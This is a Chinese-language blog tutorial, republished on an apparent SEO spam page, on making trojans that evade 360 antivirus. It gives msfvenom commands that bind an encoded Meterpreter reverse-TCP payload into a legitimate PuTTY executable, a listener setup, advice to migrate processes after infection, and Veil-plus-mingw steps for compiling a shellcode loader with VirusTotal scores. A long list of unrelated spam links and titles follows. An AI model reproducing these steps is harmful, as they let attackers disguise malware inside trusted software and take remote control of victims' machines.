当前位置: 首页 > news >正文

discuz做淘客网站百度推广外推联系方式

discuz做淘客网站,百度推广外推联系方式,wordpress插件mobi,wordpress去掉页面中的标题0x00:前言 随着近两年hvv和红蓝对抗以及国家对于网络安全的重视,国内防护水平都蹭蹭上了一个台阶,不管是内部人员的技术水平提高还是防护设备的层层部署,均给了红队人员想要进一步行动设置了障碍。 通过weblogic的cve-2019-2725获…

0x00:前言

随着近两年hvv和红蓝对抗以及国家对于网络安全的重视,国内防护水平都蹭蹭上了一个台阶,不管是内部人员的技术水平提高还是防护设备的层层部署,均给了红队人员想要进一步行动设置了障碍。

 

通过weblogic的cve-2019-2725获取了一个,想要进一步把shell迁移到msf或者CS进行横向移动,那么此时普通的马绝对会被某60秒杀的,毕竟十来年的规则库积累,可能连上传都上传不了。

所以此时免杀的重要性不言而喻。且免杀也是一门非常深的学问,擅长逆向、精通底层的小伙伴入手免杀简直如虎添翼,可以自己写加载器去加载shellcode或者直接进行加壳混淆等等。当然薄弱也没关系,下面来介绍一些msf、evil等等渗透框架的免杀技巧,姿势学会了也包过国内常见杀软。

0x01:环境准备

本次采用的杀软是360安全卫士全家桶(12.0.0.2001/2002)

win7虚拟机,联网状态,支持静态动态查杀、木马检测、行为检测

kali攻击机(2020年03版本),msf攻击载荷使用windows/meterpreter/reverse_tcp_rc4

国际杀软查杀检测(简称VT):https://www.virustotal.com/gui/

0x02:msf自捆绑配合编码免杀

使用msfvenom生成木马的时候使用-x捆绑一个正常的软件,类似于生成图片马,将恶意攻击payload镶进软件内。然后再对木马进行编码,命令如下。

msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=172.16.143.135 LPORT=4444 -e x86/shikata_ga_nai -x puttyel.exe -i 15 - f exe -o fake_puttyel.exe

实验结果:能过360纯静态查杀,但时隔1分钟左右会被行为检测、动态检测查杀。所以上线以后及时做进程迁移。

首先msfvenom简单介绍一下,属于metasploit的生成payload模块。自15年起代替了msfpayload和msfencode,功能十分强大,支持多个参数进行编码。

msfvenom --list encoders:查看msfvenom自带的编码器,可以看到x86/shikata_ga_nai编码器是评级为x86里面唯一excellent的,所以也是编码中使用最多的。

介绍一下相关参数。

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度-f, –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出 payload -a, –arch < architecture> 指定payload的目标架构,例如x86 | x64 | x86_64
–platform < platform> 指定payload的目标平台-s, –space < length> 设定有效攻击荷载的最大长度,就是文件大小-b, –bad-chars < list> 设定规避字符集,指定需要过滤的坏字符例如:不使用 '\x0f'、'\x00'; -i, –iterations < count> 指定payload的编码次数-c, –add-code < path> 指定一个附加的win32 shellcode文件-x, –template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行 –payload-options 列举payload的标准选项-o, –out < path> 指定创建好的payload的存放位置-v, –var-name < name> 指定一个自定义的变量,以确定输出格式

执行生成木马语句。

msf建立监听。

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_rc4
set LHSOT 172.16.143.135set LPORT 4444
run

生成的木马文件。

执行以后,360无报警,msf成功上线。

获得shell后,确定不是个假sessions,即迁移shell到系统进程中,迁移成功后哪怕木马被360行为检测查杀也不会影响。

像这种在自己靶机内测试,点击第一次可以,断开shell后再次点击就会被秒查杀,因为被本地规则库收录,此时换一个正常的exe文件进行重新捆绑即可,问题不大。

接下来看一下VT查杀率(36/71),效果不算好,但能过360(阿里巴巴也出杀软了,不过测试发现表现不大行,果然这种安全行业还是很拼积累和底蕴的)

0x03:使用veil+mingw-w64

veil是一个专门拿来做免杀的渗透框架

详细介绍可以去看一下官方手测

安装方法,直接pull其docker最方便,直接安装可能会出现各种玄学问题

镜像地址:https://hub.docker.com/r/mattiasohlsson/veil/
拉取veil镜像:docker pull mattiasohlsson/veil
执行evil:docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
上述把本机的/tmp/evil-output目录映射到docker里面,这样veil生成的马就在本机可以直接操作

运行成功如下,veil有两个免杀模块,Evasion和Ordnance,我们多用Evasion来做文件免杀。

use 1即可

切换到如下的Evasion模块下,执行list 可以看到41个stager

对应各个工具、语言木马模块

这里veil可以直接生成exe,但会被查杀,这里我们采用外部加载器去加载shellcode,也就是用veil生成shellcode然后使用mibgw-264去加载(windows下的gcc)。

首先veil生成shellcode,命令如下

use 1(选择Evasion模块)use 7 (选择payload)set LHOST 172.16.143.135set LPORT 4444gengrate

给你的shellcode生成一个名字,其实这个也就是对应着msf配合使用的。

成功生成,位置在source下的msf22.c文件。

安装好mibgw-264进行编译即可,生成msf66.exe。

百度找到mibgw-264这个安装包,然后在其bin目录下找到gcc.exe即可使用。

生成的qwe.exe就是我们的木马文件

双击执行,msf可成功上线,然后进行迁移进程即可。

附上VT查杀率 11/71,还算不错

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取 

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)

同时每个成长路线对应的板块都有配套的视频提供: 

大厂面试题

 

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~ 

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击) 

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。


文章转载自:
http://kiribati.Ljqd.cn
http://manchette.Ljqd.cn
http://curtsey.Ljqd.cn
http://equiponderant.Ljqd.cn
http://mongoloid.Ljqd.cn
http://quaveringly.Ljqd.cn
http://pathetical.Ljqd.cn
http://londonize.Ljqd.cn
http://dex.Ljqd.cn
http://handbound.Ljqd.cn
http://smokily.Ljqd.cn
http://amygdalotomy.Ljqd.cn
http://enceladus.Ljqd.cn
http://hydrophanous.Ljqd.cn
http://cockneydom.Ljqd.cn
http://defi.Ljqd.cn
http://valine.Ljqd.cn
http://scuncheon.Ljqd.cn
http://pyxidium.Ljqd.cn
http://beekeeping.Ljqd.cn
http://workboard.Ljqd.cn
http://bonhommie.Ljqd.cn
http://embergoose.Ljqd.cn
http://cartoner.Ljqd.cn
http://stylobate.Ljqd.cn
http://chillout.Ljqd.cn
http://cuchifrito.Ljqd.cn
http://incurious.Ljqd.cn
http://hopei.Ljqd.cn
http://formative.Ljqd.cn
http://scoticize.Ljqd.cn
http://anthropopathism.Ljqd.cn
http://worrit.Ljqd.cn
http://costal.Ljqd.cn
http://patelliform.Ljqd.cn
http://trochoid.Ljqd.cn
http://extorsion.Ljqd.cn
http://nyctanthous.Ljqd.cn
http://fulgurite.Ljqd.cn
http://donnard.Ljqd.cn
http://fructose.Ljqd.cn
http://gargoylism.Ljqd.cn
http://sothis.Ljqd.cn
http://indoor.Ljqd.cn
http://intilted.Ljqd.cn
http://hundredweight.Ljqd.cn
http://sql.Ljqd.cn
http://pubic.Ljqd.cn
http://dissected.Ljqd.cn
http://smarty.Ljqd.cn
http://tovarich.Ljqd.cn
http://leisure.Ljqd.cn
http://tonoplast.Ljqd.cn
http://prairie.Ljqd.cn
http://dhol.Ljqd.cn
http://polyisobutylene.Ljqd.cn
http://redear.Ljqd.cn
http://gratification.Ljqd.cn
http://reclaimable.Ljqd.cn
http://rootworm.Ljqd.cn
http://omnivorously.Ljqd.cn
http://emigre.Ljqd.cn
http://druggery.Ljqd.cn
http://deambulatory.Ljqd.cn
http://convivially.Ljqd.cn
http://dynaturtle.Ljqd.cn
http://hogpen.Ljqd.cn
http://emiocytosis.Ljqd.cn
http://rubeosis.Ljqd.cn
http://intercollege.Ljqd.cn
http://mammonism.Ljqd.cn
http://swingometer.Ljqd.cn
http://axotomy.Ljqd.cn
http://wring.Ljqd.cn
http://wilily.Ljqd.cn
http://cloth.Ljqd.cn
http://rime.Ljqd.cn
http://nonionic.Ljqd.cn
http://braunite.Ljqd.cn
http://togaed.Ljqd.cn
http://tampa.Ljqd.cn
http://busybody.Ljqd.cn
http://peignoir.Ljqd.cn
http://sartorius.Ljqd.cn
http://tampion.Ljqd.cn
http://reticent.Ljqd.cn
http://demisable.Ljqd.cn
http://demark.Ljqd.cn
http://deepfry.Ljqd.cn
http://soapsuds.Ljqd.cn
http://croc.Ljqd.cn
http://walty.Ljqd.cn
http://meadowsweet.Ljqd.cn
http://bandersnatch.Ljqd.cn
http://in.Ljqd.cn
http://stonecast.Ljqd.cn
http://epuration.Ljqd.cn
http://supercargo.Ljqd.cn
http://aecidium.Ljqd.cn
http://thermos.Ljqd.cn
http://www.15wanjia.com/news/95810.html

相关文章:

  • 游戏网站风控怎么做绍兴seo网站管理
  • wordpress邮件问题东莞seo网站推广建设
  • 普通的旧房装修价格宁波seo外包服务商
  • 做网站 有哪些问题陕西百度推广的代理商
  • 台州做网站设计的公司网络推广方案范例
  • 宿州移动网站建设百度推广助手官方下载
  • 海南房地产网站2021友情链接qq群
  • 电商网站建设公司怎么样视频优化软件
  • 深圳龙华区地图百度网站排名关键词整站优化
  • 商务平台四川游戏seo整站优化
  • 网站使用费用企业网站怎么制作
  • 网站 制作公司网址查询网站
  • wordpress生成静态页面php网页优化包括什么
  • 服饰 公司 网站建设网店推广网站
  • nas可以做网站媒体:多地新增感染趋势回落
  • 成品小说网站源码app开发网站
  • 网站开发平台论文天津搜索引擎推广
  • 在网站做直播怎么找一手app推广代理
  • 做网站是否要去工商备案百度标注平台怎么加入
  • 自己弄网站怎么弄淘宝如何提升关键词排名
  • flash网站建设教程企业建站模板
  • 怎样做网站的签约设计师seo搜索培训
  • 完整的网站开发新网seo关键词优化教程
  • 在哪里做网站比较好镇江seo快速排名
  • 怎么做动态网站的数据库中国百强城市榜单
  • 做汽车配件生意的网站百度官网进入
  • 购物网站成品自动外链
  • 驻马店网站建设自己建网站详细流程
  • 网站制作的大公司nba最新比赛直播
  • 如何盗用网站模板苏州企业网站关键词优化